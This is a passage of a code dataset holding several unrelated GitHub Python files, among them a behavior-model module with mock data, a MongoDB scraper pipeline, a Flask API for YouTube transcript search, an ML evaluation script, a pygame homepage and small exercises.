qry.fetch()\n\n # @staticmethod\n # def loadBehaviorsWithDimensions(user: DbUser, personId: int):\n # \"\"\"\n # niu -- missing BehaviorDimensionScores 
class below\n # \"\"\"\n # # returns raw data 4 behaviors/dimensions\n # from .behavior import\n # (\n # BehaviorDimensionScores,\n # ) # avoid circular import\n\n # allBehavior = PersonBehavior.loadOrInitByCoreIds(user, personId)\n # # print(\"found %s entries in behavior dict\" % (len(allBehavior.entries)) )\n # bds = BehaviorDimensionScores(user, personId, allBehavior)\n # bds.calc()\n # return bds\n\n # @staticmethod\n # def keyStrFromDate(dt):\n # return dt.strftime(MONTH_START_FMT_STR)\n # #\n # @staticmethod\n # def makeKey(userID, personID, dateObj):\n # assert isinstance(dateObj, date) and dateObj.day == 1, \"Err: %s %s\" % (dateObj, dateObj.day)\n # personKey = PersonBehavior.makeAncestor(userID, personID)\n # monthStartStr = PersonBehavior.keyStrFromDate(dateObj)\n # return ndb.Key(PersonBehavior, monthStartStr, parent=personKey)\n\n # @staticmethod\n # def makeAncestor(userID, personID):\n # userKey = ndb.Key(\"User\", userID)\n # return ndb.Key(\"Person\", personID, parent=userKey)\n\n @staticmethod\n def makeFakeEntry(startDate):\n # mock data for testing\n e = Entry()\n e.behaviorCode = MOCK_BEH_CODES[randIntInRange(0, len(MOCK_BEH_CODES) - 1)]\n e.feelingStrength = randIntInRange(0, 4)\n # e.significanceStrength = randIntInRange(0, 4)\n now = date.today()\n daysBetween = (now - startDate).days\n backupDays = randIntInRange(0, daysBetween)\n newDt = now - timedelta(days=backupDays)\n e.occurDateTime = datetime.combine(newDt, datetime.min.time())\n return e\n\n\nMOCK_BEH_CODES = [\n \"avoidComm\",\n \"personalboundaryCross\",\n \"shutoutFeelings\",\n \"waitedReturnmsg\",\n \"hintsNotnoticed\",\n \"brokeupSuddenly\",\n \"InfoWithheld\",\n \"exaggerateMistake\",\n \"pastFocusmistakes\",\n \"contributionsNotowned\",\n \"blamedNegsitch\",\n \"ignoredStress\",\n \"situationTooserious\",\n \"disagreethreatenleave\",\n \"disagreeThreatenhurt\",\n \"mistakeThreatenhurt\",\n \"newsBadshock\",\n \"unclearComm\",\n \"takingTurnspoorly\",\n \"empathizedPoorly\",\n \"suggestionNotuseful\",\n \"conversationLightneg-\",\n \"messageMixed\",\n \"undesiredMsgs\",\n \"talkedAboutself\",\n \"newsGoodsurprise\",\n \"overlookedMistake\",\n \"presentFocusmistakes\",\n \"contributionsOwned\",\n \"workedTogethernegsitch\",\n \"recognizedStress\",\n \"situationKeptlight\",\n \"disagreeWorkthrough\",\n \"disagreeForgiving\",\n \"mistakeForgiving\",\n \"gaveSpace\",\n \"askedpermissionCross\",\n \"sharedFeelings\",\n \"promptReturnmsg\",\n \"hintsNoticed\",\n \"infoSharetact\",\n \"clearComm\",\n \"takingTurnswell\",\n \"empathizedWell\",\n \"suggestionUseful\",\n \"conversationLightpos\",\n \"messageConsistent\",\n \"askedAboutme\",\n \"desiredMsgs\",\n \"cleanOrganized\",\n \"heightRight\",\n \"weightRight\",\n \"breathFresh\",\n \"teethStraight\",\n \"bodySmellgood\",\n \"warmConnected\",\n \"acceptedExlcusiveoffer\",\n \"initiatedDiscussexclusive\",\n]\n","repo_name":"Pathoz-LLC/ts_shared_py3","sub_path":"src/ts_shared_py3/models/behavior.py","file_name":"behavior.py","file_ext":"py","file_size_in_byte":8878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13098550015","text":"from pymongo import MongoClient\nfrom assign import settings\n\nclass Process:\n def __init__(self):\n client = MongoClient(\n settings.MONGODB_SERVER,\n settings.MONGODB_PORT\n )\n\n db = client[settings.MONGODB_DB]\n for collection in settings.MONGODB_COLLECTION:\n if collection not in db.collection_names():\n collection = db.create_collection(collection)\n 
self.blog_collection = db[settings.MONGODB_COLLECTION[0]]\n self.meta_collection = db[settings.MONGODB_COLLECTION[1]]\n\n def process(self, item):\n col = {\n 'url': item['url'],\n 'heading': item['header']\n }\n self.blog_collection.insert(dict(col))\n\n # save meta data of the blog in table 2 - 'meta'\n col2 = {\n 'url': item['url'],\n 'description': item['desc'],\n 'image': item['image'],\n 'title': item['title'],\n 'vote': item['vote']\n }\n self.meta_collection.insert(dict(col2))\n return item\n","repo_name":"gaurmohit/yCombinator-scrapper","sub_path":"assign/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73319580324","text":"class Node:\n def __init__(self,data):\n self.data=data\n self.next=None\ndef LinkedLists(arr):\n head=None\n tail=None\n for i in arr:\n if i==-1:\n break\n else:\n NewNode=Node(i)\n if head==None:\n head=NewNode\n tail=NewNode\n else:\n tail.next=NewNode\n tail=NewNode\n return head\n\ndef printLL(index,head):\n c=0\n while head is not None:\n if c==index:\n return head.data\n head=head.next\n c=c+1\n\nfor i in range(int(input())):\n arr = list(map(int, input().split()))\n index=int(input())\n if len(arr)>=index and arr.index(-1)>index:\n print(printLL(index,LinkedLists(arr)))\n else:\n print()\n","repo_name":"Svastikkka/DS-AND-ALGO","sub_path":"Linked List/Print ith node.py","file_name":"Print ith node.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"7646783585","text":"from flask import Flask, request, jsonify\nfrom YouGlance import spy\nimport json\nfrom requests import get, post\nimport time\nimport os\nfrom flask_cors import CORS\napp = Flask(__name__)\nCORS(app)\n\n\n\n@app.route('/')\ndef index():\n return \"YouTube Extension API\"\n\n@app.route(\"/youtube/get_unique_entities\",methods = ['POST'])\ndef get_unique_entities():\n data = json.loads(request.data)\n video_id = data['video_id']\n obj = spy(video_id)\n k = obj.generate_df()\n unique = obj.get_unique_ents()\n print(unique)\n return {\n \"unique_ents\": unique,\n }\n\n\n\"\"\"\n@app.get(\"/youtube/wild_card\")\ndef wild_card_search(item:Item,status_code=status.HTTP_200_OK):\n print(item.query)\n df=pd.DataFrame(item.df)\n print(df.head())\n return {\n 'Text':'Ok'\n }\n \n\"\"\"\n\n\n@app.route(\"/youtube/wild_card\",methods = ['POST'])\ndef wild_card():\n data = json.loads(request.data)\n video_id = data['video_id']\n query = data['query']\n obj = spy(video_id)\n k = obj.generate_df()\n m = obj.wildcard_search(query)\n return {\n \"wild_card\": m,\n }\n \n\n@app.route(\"/youtube/search_by_ents\",methods = ['POST'])\ndef search_by_ents():\n data = json.loads(request.data)\n video_id = data['video_id']\n query = data['query']\n print(query)\n l = [query]\n obj = spy(video_id)\n k = obj.generate_df()\n m = obj.search_by_ents(l)\n print(m)\n return {\n \"search_by_ents\": m,\n }\n\n \n\n@app.route(\"/youtube/sentiment\",methods = ['POST'])\ndef get_sentiment():\n data = json.loads(request.data)\n video_id = data['video_id']\n\n obj = spy(video_id)\n obj.generate_df()\n k = obj.sentiment_analysis((-0.2, 0.2))\n d = {\n \"Negative\": k[\"Negative\"],\n \"Positive\": k[\"Positive\"],\n \"Neutral\": k[\"Neutral\"],\n \"label_stats\": dict(obj.show_label_stats()),\n }\n return 
d\n","repo_name":"Jash271/Deployment-test-repo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34889860716","text":"def check(d,e):\n a=e[0]\n s1 = []\n for i in range(len(d)):\n for j in range(1,len(e)):\n y=e[j]\n if j==(len(e)-1) and a[i] == y[i]:\n s1.append(a[i])\n elif a[i] == y[i]:\n continue\n else:\n return s1\n return s1\nn=int(input())\ne=[]\nfor i in range(n):\n s1=input()\n e.append(s1)\nd=min(e)\nprint(\"\".join(check(d,e)))\n","repo_name":"monishramji/pyt","sub_path":"pro1.py","file_name":"pro1.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24391874965","text":"import os\nimport argparse\n\nfrom Pretraining.utils import *\nfrom Pretraining.model import RelationPT\nfrom Pretraining.model_rob import RelationPT_rob\nfrom Pretraining.data import DataLoader\nfrom transformers import (BertConfig, BertModel, BertTokenizer, BertPreTrainedModel)\nfrom Pretraining.lr_scheduler import get_linear_schedule_with_warmup\nfrom Pretraining.metric import *\n\nfrom transformers import (RobertaConfig, RobertaModel,AutoTokenizer, RobertaPreTrainedModel)\n\n#from Pretraining.eval import evaluate\nimport torch\nimport torch.nn as nn\nimport json\nfrom torch.utils.data import TensorDataset, SequentialSampler # DataLoader, RandomSampler, SequentialSampler\nfrom pathlib import Path\nfrom tqdm import tqdm\nimport pickle\nimport logging\n\nimport wandb\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s %(message)s')\nlogFormatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')\nrootLogger = logging.getLogger()\n\ndef log_data(log):\n\n with open(\"./eval/results.json\", 'r') as f:\n dataset = json.load(f)\n\n dataset.append(log)\n with open(\"./eval/results.json\", 'w+') as f:\n json.dump(dataset, f)\n\ndef evaluate(args, concept_inputs, relation_inputs, entity_inputs, attribute_inputs, model, device, global_step=0,\n prefix='', **val_loaders):\n ## relation_eval_loader, concept_eval_loader, entity_eval_loader, attribute_eval_loader\n\n # eval_output_dir = args.output_dir\n # if not os.path.exists(eval_output_dir):\n # os.makedirs(eval_output_dir)\n print(global_step)\n checkpoint =global_step\n ############################ Eval!\n ## Operators!\n nb_eval_steps = 0\n func_metric = FunctionAcc(val_loaders['operator_val_loader'].vocab['function2id'][''])\n pbar = ProgressBar(n_total=len(val_loaders['operator_val_loader']), desc=\"Evaluating\")\n correct = 0\n tot = 0\n val_loss = 0\n function_loss = 0\n for step, batch in enumerate(val_loaders['operator_val_loader']):\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n # print(batch[4].size())\n with torch.no_grad():\n batch = tuple(t.to(device) for t in batch)\n inputs = {\n # 'concept_inputs': concept_inputs,\n # 'relation_inputs': relation_inputs,\n # 'entity_inputs': entity_inputs,\n # 'attribute_inputs': attribute_inputs,\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'function_ids': batch[3],\n # 'attribute_info': (batch[4], None),\n # 'relation_info': (batch[4], None),\n 'concept_info': None,\n 'entity_info': None,\n # 'entity_embeddings': None\n 'operator_info': (batch[4], None)\n }\n outputs = model(**inputs)\n pred_functions = outputs['pred_functions'].cpu().tolist()\n pred_relation = 
outputs['pred_operator']\n gt_relation = batch[5]\n gt_relation = gt_relation.squeeze(-1)\n val_loss += float(nn.CrossEntropyLoss()(outputs['operator_logits'], gt_relation).item())\n function_loss += float(outputs['function_loss'].item())\n # print(pred_relation.size(), gt_relation.size(), batch[3].size())\n correct += torch.sum(torch.eq(pred_relation, gt_relation).float())\n # print(correct)\n tot += len(pred_relation)\n gt_functions = batch[3].cpu().tolist()\n for pred, gt in zip(pred_functions, gt_functions):\n func_metric.update(pred, gt)\n nb_eval_steps += 1\n pbar(step)\n logging.info('')\n acc = func_metric.result()\n logging.info('**** function results %s ****', prefix)\n info = 'acc: {}'.format(acc)\n logging.info(info)\n acc = correct.item() / tot\n log = {'checkpoint':checkpoint, 'acc_operations': acc, \"op_val_loss\": val_loss, 'step': global_step}\n log_data(log)\n if args.wandb:\n wandb.log(log)\n logging.info('**** operation results %s ****', prefix)\n logging.info('acc: {}'.format(acc))\n\n # Eval!\n ## Attributes!\n nb_eval_steps = 0\n func_metric = FunctionAcc(val_loaders['attribute_val_loader'].vocab['function2id'][''])\n pbar = ProgressBar(n_total=len(val_loaders['attribute_val_loader']), desc=\"Evaluating\")\n correct = 0\n tot = 0\n val_loss = 0\n function_loss = 0\n for step, batch in enumerate(val_loaders['attribute_val_loader']):\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n # print(batch[4].size())\n with torch.no_grad():\n batch = tuple(t.to(device) for t in batch)\n inputs = {\n # 'concept_inputs': concept_inputs,\n # 'relation_inputs': relation_inputs,\n # 'entity_inputs': entity_inputs,\n 'attribute_inputs': attribute_inputs,\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'function_ids': batch[3],\n 'attribute_info': (batch[4], None),\n # 'relation_info': (batch[4], None),\n 'concept_info': None,\n 'entity_info': None,\n # 'entity_embeddings': None\n }\n outputs = model(**inputs)\n pred_functions = outputs['pred_functions'].cpu().tolist()\n pred_relation = outputs['pred_attribute']\n gt_relation = batch[5]\n gt_relation = gt_relation.squeeze(-1)\n val_loss += float(nn.CrossEntropyLoss()(outputs['attribute_logits'], gt_relation).item())\n function_loss += float(outputs['function_loss'].item())\n # print(pred_relation.size(), gt_relation.size(), batch[3].size())\n correct += torch.sum(torch.eq(pred_relation, gt_relation).float())\n # print(correct)\n\n\n\n tot += len(pred_relation)\n gt_functions = batch[3].cpu().tolist()\n for pred, gt in zip(pred_functions, gt_functions):\n func_metric.update(pred, gt)\n nb_eval_steps += 1\n pbar(step)\n logging.info('')\n acc = func_metric.result()\n logging.info('**** function results %s ****', prefix)\n info = 'acc: {}'.format(acc)\n logging.info(info)\n acc = correct.item() / tot\n log = {'checkpoint': checkpoint, 'function_loss': function_loss/(step+1), 'acc_func': func_metric.result(), 'acc_attributes': acc, \"att_val_loss\": val_loss, 'step': global_step}\n log_data(log)\n if args.wandb:\n wandb.log(log)\n logging.info('**** attribute results %s ****', prefix)\n logging.info('acc: {}'.format(acc))\n\n ## Relations!\n nb_eval_steps = 0\n func_metric = FunctionAcc(val_loaders['relation_val_loader'].vocab['function2id'][''])\n pbar = ProgressBar(n_total=len(val_loaders['relation_val_loader']), desc=\"Evaluating\")\n correct = 0\n tot = 0\n val_loss = 0\n function_loss = 0\n for step, batch in enumerate(val_loaders['relation_val_loader']):\n model.eval()\n batch = 
tuple(t.to(device) for t in batch)\n # print(batch[4].size())\n with torch.no_grad():\n batch = tuple(t.to(device) for t in batch)\n inputs = {\n 'concept_inputs': concept_inputs,\n 'relation_inputs': relation_inputs,\n 'entity_inputs': entity_inputs,\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'function_ids': batch[3],\n 'relation_info': (batch[4], None),\n 'concept_info': None,\n 'entity_info': None,\n # 'entity_embeddings': None\n }\n outputs = model(**inputs)\n pred_functions = outputs['pred_functions'].cpu().tolist()\n pred_relation = outputs['pred_relation']\n gt_relation = batch[5]\n gt_relation = gt_relation.squeeze(-1)\n val_loss += float(nn.CrossEntropyLoss()(outputs['relation_logits'], gt_relation).item())\n # print(pred_relation.size(), gt_relation.size(), batch[3].size())\n correct += torch.sum(torch.eq(pred_relation, gt_relation).float())\n function_loss += float(outputs['function_loss'].item())\n # print(correct)\n tot += len(pred_relation)\n gt_functions = batch[3].cpu().tolist()\n for pred, gt in zip(pred_functions, gt_functions):\n func_metric.update(pred, gt)\n nb_eval_steps += 1\n pbar(step)\n logging.info('')\n acc = func_metric.result()\n logging.info('**** function results %s ****', prefix)\n info = 'acc: {}'.format(acc)\n logging.info(info)\n acc = correct.item() / tot\n log = {'checkpoint':checkpoint,'function_loss': function_loss/(step+1), 'acc_func': func_metric.result(), 'acc_relations': acc, \"rel_val_loss\": val_loss, 'step': global_step}\n log_data(log)\n if args.wandb:\n wandb.log(log)\n logging.info('**** relation results %s ****', prefix)\n logging.info('acc: {}'.format(acc))\n\n ## Concepts!\n nb_eval_steps = 0\n func_metric = FunctionAcc(val_loaders['concept_val_loader'].vocab['function2id'][''])\n pbar = ProgressBar(n_total=len(val_loaders['concept_val_loader']), desc=\"Evaluating\")\n correct = 0\n tot = 0\n val_loss = 0\n function_loss = 0\n for step, batch in enumerate(val_loaders['concept_val_loader']):\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n # print(batch[4].size())\n with torch.no_grad():\n batch = tuple(t.to(device) for t in batch)\n inputs = {\n 'concept_inputs': concept_inputs,\n 'relation_inputs': relation_inputs,\n 'entity_inputs': entity_inputs,\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'function_ids': batch[3],\n 'relation_info': None,\n 'concept_info': (batch[4], None),\n 'entity_info': None,\n # 'entity_embeddings': None\n }\n outputs = model(**inputs)\n pred_functions = outputs['pred_functions'].cpu().tolist()\n pred_relation = outputs['pred_concept']\n gt_relation = batch[5]\n gt_relation = gt_relation.squeeze(-1)\n val_loss += float(nn.CrossEntropyLoss()(outputs['concept_logits'], gt_relation).item())\n function_loss += float(outputs['function_loss'].item())\n # print(pred_relation.size(), gt_relation.size(), batch[3].size())\n correct += torch.sum(torch.eq(pred_relation, gt_relation).float())\n # print(correct)\n tot += len(pred_relation)\n gt_functions = batch[3].cpu().tolist()\n for pred, gt in zip(pred_functions, gt_functions):\n func_metric.update(pred, gt)\n nb_eval_steps += 1\n pbar(step)\n logging.info('')\n acc = func_metric.result()\n logging.info('**** function results %s ****', prefix)\n info = 'acc: {}'.format(acc)\n logging.info(info)\n acc = correct.item() / tot\n logging.info('**** concept results %s ****', prefix)\n logging.info('acc: {}'.format(acc))\n log = {'checkpoint':checkpoint, 'function_loss': 
function_loss/(step+1), 'acc_func': func_metric.result(), 'acc_concepts': acc, \"cons_val_loss\": val_loss, 'step': global_step}\n log_data(log)\n if args.wandb:\n wandb.log(log)\n\n # Entities!\n # with torch.no_grad():\n # model.entity_embeddings = model.bert(input_ids=entity_inputs['input_ids'],\n # attention_mask=entity_inputs['attention_mask'],\n # token_type_ids=entity_inputs['token_type_ids'])[1]\n\n # with open(os.path.abspath(args.input_dir + \"/entity/entity_embeddings_3110.pt\"), 'rb') as f:\n\n # model.entity_embeddings = pickle.load(f)\n # with open('c_embeddings.pt', 'wb') as f: #os.path.join(args.output_dir,\n # # for o in concept_embeddings:\n # # print(o)\n # pickle.dump(concept_embeddings, f)\n\n nb_eval_steps = 0\n func_metric = FunctionAcc(val_loaders['entity_val_loader'].vocab['function2id'][''])\n pbar = ProgressBar(n_total=len(val_loaders['entity_val_loader']), desc=\"Evaluating\")\n correct = 0\n tot = 0\n val_loss = 0\n results = []\n function_loss = 0\n\n for step, batch in enumerate(val_loaders['entity_val_loader']):\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n # print(batch[4].size())\n\n with torch.no_grad():\n batch = tuple(t.to(device) for t in batch)\n inputs = {\n 'concept_inputs': concept_inputs,\n 'relation_inputs': relation_inputs,\n 'entity_inputs': entity_inputs,\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'function_ids': batch[3],\n 'relation_info': None,\n 'concept_info': None,\n 'entity_info': (batch[4], None),\n # 'entity_embeddings':entity_embeddings\n }\n outputs = model(**inputs)\n pred_functions = outputs['pred_functions'].cpu().tolist()\n pred_relation = outputs['pred_entity']\n gt_relation = batch[5]\n gt_relation = gt_relation.squeeze(-1)\n val_loss += float(nn.CrossEntropyLoss()(outputs['entity_logits'], gt_relation).item())\n # print(pred_relation.size(), gt_relation.size(), batch[3].size())\n function_loss += float(outputs['function_loss'].item())\n correct += torch.sum(torch.eq(pred_relation, gt_relation).float())\n # print(correct)\n tot += len(pred_relation)\n gt_functions = batch[3].cpu().tolist()\n for pred, gt in zip(pred_functions, gt_functions):\n func_metric.update(pred, gt)\n end_id = val_loaders['entity_val_loader'].vocab['function2id']['']\n boolean = []\n for pred, label in zip(pred_functions, gt_functions):\n for i in range(min(len(pred), len(label))):\n if label[i] != pred[i]:\n match = False\n boolean.append(True)\n break\n if pred[i] == end_id and label[i] == end_id:\n boolean.append(False)\n break\n if args.model_type == 'roberta':\n tokenizer = AutoTokenizer.from_pretrained('roberta-base', do_lower_case=False)\n else:\n tokenizer = AutoTokenizer.from_pretrained('bert-base-cased', do_lower_case=False)\n sents = tokenizer.batch_decode(inputs['input_ids'].to('cpu'))\n\n for des, val, pred, label in zip(boolean, sents, pred_functions, gt_functions):\n results.append({'question': val, 'prediction': pred, 'functions': label, 'label': des})\n nb_eval_steps += 1\n pbar(step)\n logging.info('')\n acc = func_metric.result()\n logging.info('**** function results %s ****', prefix)\n info = 'acc: {}'.format(acc)\n logging.info(info)\n acc = correct.item() / tot\n logging.info('**** entity results %s ****', prefix)\n logging.info('acc: {}'.format(acc))\n log = {'checkpoint':checkpoint, 'function_loss': function_loss/(step+1), 'acc_func': func_metric.result(), 'acc_entities': acc, \"ent_val_loss\": val_loss, 'step': global_step}\n print(results[0:3])\n with 
open(f'./eval/function_predictions_{checkpoint}.json', 'w') as fp:\n json.dump(results, fp)\n log_data(log)\n\n if args.wandb:\n wandb.log(log)\n\n\n\n\ndef embed_ents(model,args):\n batch_num = 128\n # argument_inputs = load_classes(input_dir + \"esa/new/entity_3110.pt\", )\n argument_inputs = load_classes(args.data_dir + \"/entity/entity.pt\",'cpu')\n data = TensorDataset(argument_inputs['input_ids'], argument_inputs['attention_mask'],\n argument_inputs['token_type_ids'])\n data_sampler = SequentialSampler(data)\n dataloader = torch.utils.data.DataLoader(data, sampler=data_sampler, batch_size=batch_num)\n\n attribute_embeddings = []\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n with torch.no_grad():\n for i, batch in enumerate(tqdm(dataloader)):\n # if i == 1:\n # break\n inputs = batch[0].to(device)\n masks = batch[1].to(device)\n tags = batch[2].to(device)\n\n attribute_embeddings += model.bert(input_ids=inputs,\n attention_mask=masks,\n token_type_ids=tags)[1].cpu()\n attribute_embeddings = torch.stack(attribute_embeddings)\n\n model.entity_embeddings = attribute_embeddings.cuda()\n\ndef load_classes(path,device):\n with open(os.path.abspath(path), 'rb') as f:\n input_ids = pickle.load(f)\n token_type_ids = pickle.load(f)\n attention_mask = pickle.load(f)\n # input_ids = torch.LongTensor(input_ids[:512,:]).to(device)\n # token_type_ids = torch.LongTensor(token_type_ids[:512,:]).to(device)\n # attention_mask = torch.LongTensor(attention_mask[:512,:]).to(device)\n input_ids = torch.LongTensor(input_ids).to(device)\n token_type_ids = torch.LongTensor(token_type_ids).to(device)\n attention_mask = torch.LongTensor(attention_mask).to(device)\n argument_inputs = {\n 'input_ids': input_ids,\n 'token_type_ids': token_type_ids,\n 'attention_mask': attention_mask\n }\n return argument_inputs\n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--models_dir', type=str, default='./train/')\n parser.add_argument('--data_dir', type=str, default='./test_data/')\n parser.add_argument('--val_batch_size', type=int, default=128)\n parser.add_argument('--wandb', type=int, default=1)\n parser.add_argument('--model_type', type=str, default=\"bert\")\n #parser.add_argument('--save_dir', type=int, default=128)\n\n args = parser.parse_args()\n vocab_json = os.path.join(args.data_dir, 'vocab.json')\n operator_val_pt = os.path.join(args.data_dir, 'operator', 'dev.pt')\n concept_val_pt = os.path.join(args.data_dir, 'concept', 'dev.pt')\n entity_val_pt = os.path.join(args.data_dir, 'entity', 'dev.pt')\n relation_val_pt = os.path.join(args.data_dir, 'relation', 'dev.pt')\n attribute_val_pt = os.path.join(args.data_dir, 'attribute', 'dev.pt')\n\n concept_val_loader = DataLoader(vocab_json, concept_val_pt, args.val_batch_size)\n relation_val_loader = DataLoader(vocab_json, relation_val_pt, args.val_batch_size)\n entity_val_loader = DataLoader(vocab_json, entity_val_pt, args.val_batch_size)\n attribute_val_loader = DataLoader(vocab_json, attribute_val_pt, args.val_batch_size)\n operator_val_loader = DataLoader(vocab_json, operator_val_pt, args.val_batch_size)\n\n val_loaders = {'entity_val_loader': entity_val_loader,\n 'concept_val_loader': concept_val_loader,\n 'attribute_val_loader': attribute_val_loader,\n 'operator_val_loader': operator_val_loader,\n 'relation_val_loader': relation_val_loader,\n }\n models_path = Path(args.models_dir)\n\n if args.wandb:\n wandb.init(project=\"ProgramTransfer_Augmentation1001\", name=args.models_dir)\n\n for model_dir in 
models_path.iterdir():\n if not model_dir.is_dir():\n continue\n\n if args.model_type == 'bert':\n\n config_class, model_class = (BertConfig, RelationPT)\n\n else:\n\n config_class, model_class = (RobertaConfig, RelationPT_rob)\n\n print(\"load ckpt from {}\".format(model_dir))\n config = config_class.from_pretrained(model_dir) # , num_labels = len(label_list))\n model = model_class.from_pretrained(model_dir, config=config)\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n if torch.cuda.is_available(): #\n model.cuda()\n\n embed_ents(model,args)\n\n attribute_inputs = load_classes(args.data_dir + \"attribute/attribute.pt\", device)\n # with torch.no_grad():\n # attribute_embeddings = model.bert(input_ids=argument_inputs['input_ids'],\n # attention_mask=argument_inputs['attention_mask'],\n # token_type_ids=argument_inputs['token_type_ids'])[1]\n\n concept_inputs = load_classes(args.data_dir + \"concept/concept.pt\", device)\n # with torch.no_grad():\n # concept_embeddings = model.bert(input_ids=argument_inputs['input_ids'],\n # attention_mask=argument_inputs['attention_mask'],\n # token_type_ids=argument_inputs['token_type_ids'])[1]\n\n ##argument_inputs = load_classes(input_dir + \"relation/relation.pt\", device)\n # with torch.no_grad():\n # relation_embeddings = _model.bert(input_ids=argument_inputs['input_ids'],\n # attention_mask=argument_inputs['attention_mask'],\n # token_type_ids=argument_inputs['token_type_ids'])[1]\n\n relation_inputs = load_classes(args.data_dir + \"relation/relation.pt\", device)\n # with torch.no_grad():\n # relation_embeddings = model.bert(input_ids=argument_inputs['input_ids'],\n # attention_mask=argument_inputs['attention_mask'],\n # token_type_ids=argument_inputs['token_type_ids'])[1]\n\n #checkpoint = str(model_dir).split('\\\\')[-1]\n checkpoint = str(model_dir).split(\"checkpoint-\")[1]\n entity_inputs = []\n evaluate(args, concept_inputs, relation_inputs, entity_inputs, attribute_inputs, model,device, global_step=int(checkpoint), **val_loaders)\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n","repo_name":"PaulDrm/DISCOSQA","sub_path":"app/Pretraining/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":22352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"9224433619","text":"import pygame, sys, math\nimport serial\nimport threading\n\nfrom config import *\nfrom util import *\nfrom status import *\n\ndef homePage():\n\tgameDisplay = pygame.display.set_mode((Config.display_width, Config.display_height))\n\tclock = pygame.time.Clock()\n\n\tintro = True\n\n\twhile intro:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tStatus.isQuit = True\n\t\t\t\tintro = False\n\t\t\t\tsys.exit()\n\n\t\tmouse = pygame.mouse.get_pos()\n\t\tclick = pygame.mouse.get_pressed()\n\n\t\tgameDisplay.fill(Config.white)\n\n\t\t#drawImage(gameDisplay, \"media/background.jpg\", Config.display_width//2, Config.display_height//2, (Config.display_width,Config.display_height))\n\t\tdrawImage(gameDisplay, \"media/pianoop.png\", Config.display_width//2, Config.display_height//2+50, (200,200))\n\t\tdrawText(gameDisplay, \"P I A N E E R\", Config.display_width//2, Config.display_height//2 + 180, \"Courier New\", 30, Config.black)\n\n\t\tif math.sqrt((mouse[0]-980)**2+(mouse[1]-50)**2) <= 15:\n\t\t\tpygame.draw.circle(gameDisplay, Config.grey, (980,50), 15)\n\t\t\tpygame.draw.line(gameDisplay, Config.black, (970,40), (988,60), 
2)\n\t\t\tpygame.draw.line(gameDisplay, Config.black, (988,40), (970,60), 2)\n\t\t\tif click[0] == 1:\n\t\t\t\tpygame.quit()\n\t\t\t\tStatus.isQuit = True\n\t\t\t\tintro = False\n\t\t\t\tsys.exit()\n\t\telse:\n\t\t\tpygame.draw.circle(gameDisplay, Config.darkGrey, (980,50), 15)\n\t\t\tpygame.draw.line(gameDisplay, Config.black, (970,40), (988,60), 2)\n\t\t\tpygame.draw.line(gameDisplay, Config.black, (988,40), (970,60), 2)\n\n\t\t\n\t\tpygame.display.update()\n\t\tclock.tick(60)\n\n\ndef runHomepage():\n\tpygame.init()\n\thomePage()\n\n\nif __name__ == '__main__':\n\trunHomepage()","repo_name":"rickzx/PortablePiano","sub_path":"Software/homepage.py","file_name":"homepage.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"74777460965","text":"import csv\n\npeople = [\n    {'name': 'Maria', 'age': 25, 'job': 'Scientist'},\n    {'name': 'Wes', 'age': 8, 'job': 'Programmer'},\n    {'name': 'Greg', 'age': 48, 'job': 'Big boss'},\n    ]\n\nwith open('people.csv', 'w', encoding='utf8', newline='') as f:\n    fields = ['name', 'age', 'job']\n    writer = csv.DictWriter(f, fields, delimiter=';')\n    writer.writeheader()\n    for user in people:\n        writer.writerow(user)\n","repo_name":"AlexGlau/pythonCourse","sub_path":"files/csv_file.py","file_name":"csv_file.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
